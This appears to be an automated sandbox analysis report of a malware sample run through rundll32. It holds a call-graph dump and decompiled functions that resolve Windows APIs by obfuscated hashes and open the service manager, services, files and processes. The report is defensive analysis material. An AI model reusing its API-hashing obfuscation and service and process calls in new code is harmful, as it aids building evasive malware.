4872->4974 4981 1c3de2 4872->4981 4984 1dd389 4872->4984 5014 1d7cdb 4873->5014 4875 1cab87 3 API calls 4892 1d570e 4875->4892 4876 1d8519 GetPEB 4876->4892 4877 1c4816 2 API calls 4877->4892 4878 1d46bb 2 API calls 4878->4892 4879 1d5b08 4880 1d1e67 2 API calls 4879->4880 4881 1d5b06 4880->4881 4881->4165 4882 1dda22 GetPEB 4882->4892 4883 1ccb52 GetPEB 4883->4892 4885 1cb6cf GetPEB 4885->4892 4887 1c8969 GetPEB 4887->4892 4888 1d453f GetPEB 4888->4892 4889 1ddcf7 RtlAllocateHeap GetPEB 4889->4892 4890 1ca8b0 GetPEB 4890->4892 4891 1c47ce GetPEB 4891->4892 4892->4875 4892->4876 4892->4877 4892->4878 4892->4879 4892->4881 4892->4882 4892->4883 4892->4885 4892->4887 4892->4888 4892->4889 4892->4890 4892->4891 4893 1cea99 3 API calls 4892->4893 5017 1ddedc 4892->5017 5023 1d8727 4892->5023 4893->4892 4904 1cf696 4894->4904 4895 1d46bb 2 API calls 4895->4904 4896 1cf88f 4896->4165 4897 1dda22 GetPEB 4897->4904 4898 1cb6cf GetPEB 4898->4904 4899 1c8969 GetPEB 4899->4904 4900 1ca8b0 GetPEB 4900->4904 4901 1ddcf7 RtlAllocateHeap GetPEB 4901->4904 4902 1cab87 3 API calls 4902->4904 4903 1c47ce GetPEB 4903->4904 4904->4895 4904->4896 4904->4897 4904->4898 4904->4899 4904->4900 4904->4901 4904->4902 4904->4903 4905 1cea99 3 API calls 4904->4905 4905->4904 4912 1c9a55 4906->4912 4907 1c9b63 4907->4165 4908 1c9b65 4910 1d9e56 GetPEB 4908->4910 4910->4907 4912->4907 4912->4908 5027 1c46be 4912->5027 5031 1dc3a0 4912->5031 5039 1c7c37 4912->5039 4915 1d1c8c 4914->4915 4916 1cab87 3 API calls 4915->4916 4917 1d1dd2 4915->4917 4918 1dda22 GetPEB 4915->4918 4919 1cb6cf GetPEB 4915->4919 4920 1c8969 GetPEB 4915->4920 4921 1ddcf7 2 API calls 4915->4921 4922 1c47ce GetPEB 4915->4922 4923 1ca8b0 GetPEB 4915->4923 4924 1cea99 3 API calls 4915->4924 4916->4915 4917->4165 4918->4915 4919->4915 4920->4915 4921->4915 4922->4915 4923->4915 4924->4915 4931 1cba53 4925->4931 4926 1cbb60 4929 1d9e56 GetPEB 4926->4929 4927 1cbb5e 4927->4165 4928 1dc3a0 GetPEB 4928->4931 4929->4927 4930 1c46be GetPEB 4930->4931 4931->4926 4931->4927 4931->4928 4931->4930 4932 1c7c37 GetPEB 4931->4932 4932->4931 4934 1d9e69 4933->4934 4937 1c6bf2 4934->4937 4938 1c6c0c 4937->4938 4939 1daa30 GetPEB 4938->4939 4940 1c6c8f 4939->4940 4940->4837 4942 1cb6e5 4941->4942 4943 1daa30 GetPEB 4942->4943 4944 1cb742 4943->4944 4944->4850 4946 1c8980 4945->4946 4947 1dd25e GetPEB 4946->4947 4948 1c8a5d 4947->4948 4948->4850 4954 1ceab9 4949->4954 4950 1cecec 4950->4850 4951 1c8f65 2 API calls 4951->4954 4952 1cecd6 4955 1d1e67 2 API calls 4952->4955 4954->4950 4954->4951 4954->4952 4966 1c19b8 4954->4966 4955->4950 4957 1cabb0 4956->4957 4958 1c4b61 GetPEB 4957->4958 4959 1cad67 4958->4959 4970 1c7f5d 4959->4970 4961 1cad99 4962 1cada4 4961->4962 4963 1d1e67 2 API calls 4961->4963 4962->4850 4964 1cadc4 4963->4964 4965 1d1e67 2 API calls 4964->4965 4965->4962 4967 1c19dd 4966->4967 4968 1daa30 GetPEB 4967->4968 4969 1c1a3f 4968->4969 4969->4954 4971 1c7f8e 4970->4971 4972 1daa30 GetPEB 4971->4972 4973 1c7fd4 CreateProcessW 4972->4973 4973->4961 4975 1dbb48 4974->4975 4976 1d1e67 2 API calls 4975->4976 4978 1dbe1d 4975->4978 4980 1c3de2 GetPEB 4975->4980 4994 1e0ac8 4975->4994 4998 1dd8ec 4975->4998 4976->4975 4978->4872 4980->4975 4982 1daa30 GetPEB 4981->4982 4983 1c3e36 4982->4983 4983->4872 4987 1dd3c3 4984->4987 4986 1dd82d 5010 1d9008 4986->5010 4987->4986 4989 1c4b61 GetPEB 4987->4989 4990 1dd82b 4987->4990 4991 1ddcf7 2 API calls 4987->4991 4993 1ca8b0 GetPEB 4987->4993 5002 1dde10 4987->5002 5006 1c4241 4987->5006 4989->4987 4990->4872 4991->4987 4993->4987 4995 1e0af2 4994->4995 4996 1daa30 GetPEB 4995->4996 4997 1e0b4e 4996->4997 4997->4975 4999 1dd8ff 4998->4999 5000 1daa30 GetPEB 4999->5000 5001 1dd96e 5000->5001 5001->4975 5003 1dde56 5002->5003 5004 1daa30 GetPEB 5003->5004 5005 1ddeba 5004->5005 5005->4987 5007 1c4257 5006->5007 5008 1daa30 GetPEB 5007->5008 5009 1c42b3 5008->5009 5009->4987 5011 1d901a 5010->5011 5012 1daa30 GetPEB 5011->5012 5013 1d9074 5012->5013 5013->4990 5015 1daa30 GetPEB 5014->5015 5016 1d7d3e 5015->5016 5016->4892 5021 1ddf09 5017->5021 5018 1de1a5 5019 1e0e3a GetPEB 5018->5019 5020 1de1a3 5019->5020 5020->4892 5021->5018 5021->5020 5022 1c7ff2 2 API calls 5021->5022 5022->5021 5024 1d8758 5023->5024 5025 1daa30 GetPEB 5024->5025 5026 1d87b7 5025->5026 5026->4892 5028 1c46e5 5027->5028 5029 1daa30 GetPEB 5028->5029 5030 1c4737 5029->5030 5030->4912 5032 1dc3bc 5031->5032 5033 1dc627 5032->5033 5044 1ca3a3 5032->5044 5033->4912 5036 1ced7e GetPEB 5037 1dc5e2 5036->5037 5037->5033 5038 1ced7e GetPEB 5037->5038 5038->5037 5040 1c7c52 5039->5040 5041 1dcadf GetPEB 5040->5041 5042 1c7df1 5040->5042 5048 1c6ca0 5040->5048 5041->5040 5042->4912 5045 1ca3c0 5044->5045 5046 1daa30 GetPEB 5045->5046 5047 1ca41a 5046->5047 5047->5033 5047->5036 5049 1c6cb8 5048->5049 5050 1daa30 GetPEB 5049->5050 5051 1c6d15 5050->5051 5051->5040 5053 1daa30 GetPEB 5052->5053 5054 1cf8f4 5053->5054 5054->4177 5056 1ca9e6 5055->5056 5057 1daa30 GetPEB 5056->5057 5058 1caa3f 5057->5058 5058->4177 5060 1c8ee7 5059->5060 5061 1daa30 GetPEB 5060->5061 5062 1c8f54 5061->5062 5062->4177 5065 1c435e 5063->5065 5064 1c7ff2 2 API calls 5064->5065 5065->5064 5066 1cae64 GetPEB 5065->5066 5067 1c457c 5065->5067 5068 1c45a6 5065->5068 5066->5065 5074 1cae64 5067->5074 5068->4177 5071 1c4e8f 5070->5071 5072 1daa30 GetPEB 5071->5072 5073 1c4ed7 5072->5073 5073->4177 5075 1cae8b 5074->5075 5076 1daa30 GetPEB 5075->5076 5077 1caee2 5076->5077 5077->5068 5083 1d001b 5078->5083 5079 1d8606 2 API calls 5079->5083 5082 1d031b 5082->4183 5083->5079 5083->5082 5085 1ca8b0 GetPEB 5083->5085 5086 1ccd29 5083->5086 5090 1cee81 5083->5090 5095 1c2206 5083->5095 5085->5083 5087 1ccd3f 5086->5087 5088 1daa30 GetPEB 5087->5088 5089 1ccd9f 5088->5089 5089->5083 5099 1d8f15 5090->5099 5092 1ceff7 5092->5083 5096 1c222a 5095->5096 5097 1ca42d GetPEB 5096->5097 5098 1c2249 5097->5098 5098->5083 5100 1d8f34 5099->5100 5101 1daa30 GetPEB 5100->5101 5102 1cefa8 5101->5102 5102->5092 5103 1ddb43 5102->5103 5104 1ddb6c 5103->5104 5105 1daa30 GetPEB 5104->5105 5106 1ddbd4 5105->5106 5106->5092 5108 1c7b13 5107->5108 5109 1daa30 GetPEB 5108->5109 5110 1c7b7c 5109->5110 5110->4192 5112 1d8b6f 5111->5112 5113 1daa30 GetPEB 5112->5113 5114 1d8bd5 5113->5114 5114->3993 5116 1c9df5 5115->5116 5118 1ca305 5116->5118 5119 1ddcf7 RtlAllocateHeap GetPEB 5116->5119 5121 1ca918 GetPEB 5116->5121 5123 1ca8b0 GetPEB 5116->5123 5124 1c47ce GetPEB 5116->5124 5125 1c9dcf 2 API calls 5116->5125 5126 1c4635 5116->5126 5130 1c7e00 5116->5130 5134 1c8abf 5116->5134 5118->4215 5119->5116 5121->5116 5123->5116 5124->5116 5125->5116 5127 1c464b 5126->5127 5128 1daa30 GetPEB 5127->5128 5129 1c46b0 5128->5129 5129->5116 5131 1c7e18 5130->5131 5132 1daa30 GetPEB 5131->5132 5133 1c7e79 5132->5133 5133->5116 5135 1c8ad1 5134->5135 5136 1daa30 GetPEB 5135->5136 5137 1c8b32 5136->5137 5137->5116 5149 1ce2cc 5138->5149 5142 1c9ba6 5141->5142 5172 1c91dd 5142->5172 5147 1d1e67 2 API calls 5148 1c9d26 5147->5148 5148->4222 5153 1ce2f1 5149->5153 5154 1ce4ef 5153->5154 5156 1c5357 5153->5156 5158 1c5988 5153->5158 5161 1c8e4d 5153->5161 5164 1dc15d 5153->5164 5168 1c2a58 5153->5168 5157 1d1e67 2 API calls 5154->5157 5156->4222 5157->5156 5159 1daa30 GetPEB 5158->5159 5160 1c59db 5159->5160 5160->5153 5162 1d5c73 GetPEB 5161->5162 5163 1c8eb3 5162->5163 5163->5153 5165 1dc176 5164->5165 5166 1daa30 GetPEB 5165->5166 5167 1dc1de 5166->5167 5167->5153 5169 1c2a71 5168->5169 5170 1daa30 GetPEB 5169->5170 5171 1c2ad6 5170->5171 5171->5153 5173 1daa30 GetPEB 5172->5173 5174 1c923b 5173->5174 5174->5148 5175 1c76aa 5174->5175 5176 1c76cd 5175->5176 5177 1daa30 GetPEB 5176->5177 5178 1c7723 5177->5178 5178->5147 5180 1de365 5179->5180 5181 1ca42d GetPEB 5180->5181 5182 1de38d 5181->5182 5182->4233 5184 1c410d 5183->5184 5186 1ddcf7 2 API calls 5184->5186 5187 1c421e 5184->5187 5189 1c421c 5184->5189 5190 1caad6 GetPEB 5184->5190 5191 1ca8b0 GetPEB 5184->5191 5203 1c1f53 5184->5203 5186->5184 5188 1c1fd1 GetPEB 5187->5188 5188->5189 5189->4253 5190->5184 5191->5184 5193 1d6c65 5192->5193 5194 1c4b61 GetPEB 5193->5194 5195 1d6d92 5193->5195 5198 1d6db0 5193->5198 5211 1c9d31 5193->5211 5194->5193 5207 1d6637 5195->5207 5198->4253 5200 1cb1db 5199->5200 5201 1daa30 GetPEB 5200->5201 5202 1cb231 5201->5202 5202->4245 5204 1c1f6f 5203->5204 5205 1daa30 GetPEB 5204->5205 5206 1c1fc3 5205->5206 5206->5184 5208 1d6659 5207->5208 5209 1daa30 GetPEB 5208->5209 5210 1d66b7 5209->5210 5210->5198 5212 1c9d52 5211->5212 5213 1daa30 GetPEB 5212->5213 5214 1c9dc1 5213->5214 5214->5193 5215 1ce991 5216 1cea8d 5215->5216 5217 1cea62 5215->5217 5221 1cf8fd 5217->5221 5220 1c93ed 2 API calls 5220->5216 5231 1cfde0 5221->5231 5222 1cffd1 5224 1cab87 3 API calls 5222->5224 5223 1c4b61 GetPEB 5223->5231 5225 1cea75 5224->5225 5225->5216 5225->5220 5226 1cf899 GetPEB 5226->5231 5227 1d46bb 2 API calls 5227->5231 5228 1ddcf7 RtlAllocateHeap GetPEB 5228->5231 5229 1dda22 GetPEB 5229->5231 5231->5222 5231->5223 5231->5225 5231->5226 5231->5227 5231->5228 5231->5229 5232 1c47ce GetPEB 5231->5232 5233 1ca8b0 GetPEB 5231->5233 5234 1cb23c 5231->5234 5232->5231 5233->5231 5235 1cb254 5234->5235 5236 1daa30 GetPEB 5235->5236 5237 1cb2b8 lstrcmpiW 5236->5237 5237->5231 5258 1c1993 5259 1c19dd 5258->5259 5260 1daa30 GetPEB 5259->5260 5261 1c1a3f 5260->5261 5283 1c4ee3 5284 1cb6cf GetPEB 5283->5284 5285 1c5133 5284->5285 5286 1cb23c 2 API calls 5285->5286 5287 1c514c 5286->5287 5288 1c51ad 5287->5288 5289 1ddcf7 2 API calls 5287->5289 5290 1c5167 5289->5290 5291 1c47ce GetPEB 5290->5291 5292 1c518e 5291->5292 5293 1ca8b0 GetPEB 5292->5293 5294 1c519b 5293->5294 5295 1d1f8a 2 API calls 5294->5295 5295->5288

                                                                                                                    Executed Functions

                                                                                                                    Function 001C912C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 250 1c912c-1c91af call 1d20b9 call 1daa30 OpenSCManagerW
                                                                                                                    C-Code - Quality: 54%
                                                                                                                    			E001C912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t32;
				signed int _t34;
				int _t43;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t43 = __ecx;
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E001D20B9(_t24);
				_v12 = 0x4657ea;
				_t34 = 0x1b;
				_v12 = _v12 / _t34;
				_v12 = _v12 ^ 0x000ac4f3;
				_v8 = 0xb5c996;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x19;
				_v8 = _v8 + 0x3329;
				_v8 = _v8 ^ 0x01161fa0;
				E001DAA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
				_t32 = OpenSCManagerW(0, 0, _t43); // executed
				return _t32;
			}









                                                                                                                    0x001c912f
                                                                                                                    0x001c9130
                                                                                                                    0x001c9133
                                                                                                                    0x001c9138
                                                                                                                    0x001c913a
                                                                                                                    0x001c913d
                                                                                                                    0x001c913e
                                                                                                                    0x001c9141
                                                                                                                    0x001c9143
                                                                                                                    0x001c9144
                                                                                                                    0x001c9149
                                                                                                                    0x001c915a
                                                                                                                    0x001c9162
                                                                                                                    0x001c916a
                                                                                                                    0x001c9171
                                                                                                                    0x001c9178
                                                                                                                    0x001c9186
                                                                                                                    0x001c9189
                                                                                                                    0x001c9190
                                                                                                                    0x001c919d
                                                                                                                    0x001c91a8
                                                                                                                    0x001c91af

                                                                                                                    APIs
                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 001C91A8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ManagerOpen
                                                                                                                    • String ID: WF
                                                                                                                    • API String ID: 1889721586-2390014890
                                                                                                                    • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                    • Instruction ID: 3b6f04e61a8cdad894c52e74e20cd55e9d5f7e12adceb6ce1378df4421671917
                                                                                                                    • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                    • Instruction Fuzzy Hash: 05016571901208FBEB08CF99DD4ACAFBFB8EB95714F60809AF404A7200D3B15F109AA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001C42C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39serviceCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 255 1c42c4-1c4345 call 1d20b9 call 1daa30 OpenServiceW
                                                                                                                    C-Code - Quality: 48%
                                                                                                                    			E001C42C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t34 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D20B9(_t24);
				_v8 = 0x971c9e;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xbdaa;
				_v8 = _v8 | 0x44f2c0c3;
				_v8 = _v8 ^ 0x44fb9439;
				_v12 = 0x762558;
				_v12 = _v12 | 0xdc63e739;
				_v12 = _v12 ^ 0xdc7b8d87;
				E001DAA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
				return _t29;
			}








                                                                                                                    0x001c42c7
                                                                                                                    0x001c42c8
                                                                                                                    0x001c42ca
                                                                                                                    0x001c42cd
                                                                                                                    0x001c42cf
                                                                                                                    0x001c42d2
                                                                                                                    0x001c42d5
                                                                                                                    0x001c42d8
                                                                                                                    0x001c42db
                                                                                                                    0x001c42dc
                                                                                                                    0x001c42dd
                                                                                                                    0x001c42e2
                                                                                                                    0x001c42ec
                                                                                                                    0x001c42f5
                                                                                                                    0x001c42fc
                                                                                                                    0x001c4303
                                                                                                                    0x001c430a
                                                                                                                    0x001c4311
                                                                                                                    0x001c4318
                                                                                                                    0x001c4330
                                                                                                                    0x001c433f
                                                                                                                    0x001c4345

                                                                                                                    APIs
                                                                                                                    • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,001D4A8F,?,?,2635DC09), ref: 001C433F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: OpenService
                                                                                                                    • String ID: X%v
                                                                                                                    • API String ID: 3098006287-3430654708
                                                                                                                    • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                    • Instruction ID: 3bebb619aadb5032a6cf0e803a0a7b7629517103a68ccd80fb68753a7249bede
                                                                                                                    • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                    • Instruction Fuzzy Hash: 5A0144B281120CFBDF05DFD0D9468DEBF78EF14310F108189F90562221D3729B209B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001C8F65 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 260 1c8f65-1c9010 call 1d20b9 call 1daa30 CreateFileW
                                                                                                                    C-Code - Quality: 35%
                                                                                                                    			E001C8F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t32;
				void* _t38;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D20B9(_t32);
				_v28 = 0xee6fdc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x957ab3;
				_v12 = _v12 ^ 0x02d9a910;
				_v12 = _v12 + 0xffff8488;
				_v12 = _v12 ^ 0x02485b8e;
				_v8 = 0xf6b813;
				_v8 = _v8 + 0xffff9c70;
				_v8 = _v8 + 0xffff858c;
				_v8 = _v8 ^ 0x00f72129;
				E001DAA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
				return _t38;
			}









                                                                                                                    0x001c8f6d
                                                                                                                    0x001c8f72
                                                                                                                    0x001c8f73
                                                                                                                    0x001c8f76
                                                                                                                    0x001c8f79
                                                                                                                    0x001c8f7c
                                                                                                                    0x001c8f7f
                                                                                                                    0x001c8f80
                                                                                                                    0x001c8f83
                                                                                                                    0x001c8f86
                                                                                                                    0x001c8f8a
                                                                                                                    0x001c8f8b
                                                                                                                    0x001c8f90
                                                                                                                    0x001c8f9f
                                                                                                                    0x001c8faa
                                                                                                                    0x001c8fb1
                                                                                                                    0x001c8fb2
                                                                                                                    0x001c8fb9
                                                                                                                    0x001c8fc0
                                                                                                                    0x001c8fc7
                                                                                                                    0x001c8fce
                                                                                                                    0x001c8fd5
                                                                                                                    0x001c8fdc
                                                                                                                    0x001c8fe3
                                                                                                                    0x001c8ff0
                                                                                                                    0x001c9009
                                                                                                                    0x001c9010

                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 001C9009
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                    • Instruction ID: eefa312d0f5cf9b642953b9b833767571b64715d804af2f9767145128d387c31
                                                                                                                    • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                    • Instruction Fuzzy Hash: C5112B72900219FBCF219FE5DD098DFBFB5EF58354F118149F90862121C3728A61EB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001C7F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 265 1c7f5d-1c7ff1 call 1d20b9 call 1daa30 CreateProcessW
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,001CAD99,?,?,?,181C8C04,001CAD99), ref: 001C7FEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction ID: cb67c80931af881b161768f173d6e3b06836fdbd1472b9c07ea7dc0393155320
                                                                                                                    • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction Fuzzy Hash: 0D11D372402128BBDF619F91DD09CEF7F79EF193A4F549244FA1921121D3728A60EBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001C4DDD Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 270 1c4ddd-1c4e73 call 1d20b9 call 1daa30 SHFileOperationW
                                                                                                                    C-Code - Quality: 16%
                                                                                                                    			E001C4DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				int _t38;
				signed int _t40;
				signed int _t44;
				struct _SHFILEOPSTRUCTW* _t45;

				_push(_a12);
				_t45 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001D20B9(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x8324bd;
				_v20 = 0xe59c0f;
				_v12 = 0xfa6a5a;
				_v12 = _v12 | 0x6fcfbea7;
				_t40 = 0x1a;
				_push(0x3771311d);
				_push(_t40);
				_v12 = _v12 * 0x42;
				_v12 = _v12 ^ 0xdff430a4;
				_v8 = 0x460bc4;
				_v8 = _v8 | 0x3946640e;
				_push(0xdf0d4f1a);
				_v8 = _v8 / _t40;
				_v8 = _v8 + 0x2a2;
				_v8 = _v8 ^ 0x023f16a4;
				_t44 = 0x58;
				E001DAA30(_t44);
				_t38 = SHFileOperationW(_t45); // executed
				return _t38;
			}













                                                                                                                    0x001c4de4
                                                                                                                    0x001c4de7
                                                                                                                    0x001c4de9
                                                                                                                    0x001c4dec
                                                                                                                    0x001c4def
                                                                                                                    0x001c4df1
                                                                                                                    0x001c4df6
                                                                                                                    0x001c4dfd
                                                                                                                    0x001c4e06
                                                                                                                    0x001c4e0d
                                                                                                                    0x001c4e14
                                                                                                                    0x001c4e21
                                                                                                                    0x001c4e22
                                                                                                                    0x001c4e27
                                                                                                                    0x001c4e28
                                                                                                                    0x001c4e2b
                                                                                                                    0x001c4e32
                                                                                                                    0x001c4e39
                                                                                                                    0x001c4e45
                                                                                                                    0x001c4e4a
                                                                                                                    0x001c4e4d
                                                                                                                    0x001c4e54
                                                                                                                    0x001c4e63
                                                                                                                    0x001c4e64
                                                                                                                    0x001c4e6d
                                                                                                                    0x001c4e73

                                                                                                                    APIs
                                                                                                                    • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 001C4E6D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileOperation
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3080627654-0
                                                                                                                    • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                    • Instruction ID: 53574c39e5200cc11d8abbe26beb95054f6f81559dff106a5dd9800b56d6cfd3
                                                                                                                    • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                    • Instruction Fuzzy Hash: 27015BB5E0120DFBCB14EFA4D9469DEBFB4EF40314F50C089E904A7251D3B44B549B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001C5DDD Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E001C5DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;
				void* _t31;
				void* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_t34 = __ecx;
				E001D20B9(_t21);
				_v12 = 0x9fac18;
				_v12 = _v12 ^ 0x90454497;
				_v12 = _v12 ^ 0x90d3245f;
				_v8 = 0x647eb;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xffff0b9f;
				_v8 = _v8 ^ 0xfff54d3d;
				_t25 = E001DAA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
				return _t26;
			}












                                                                                                                    0x001c5de9
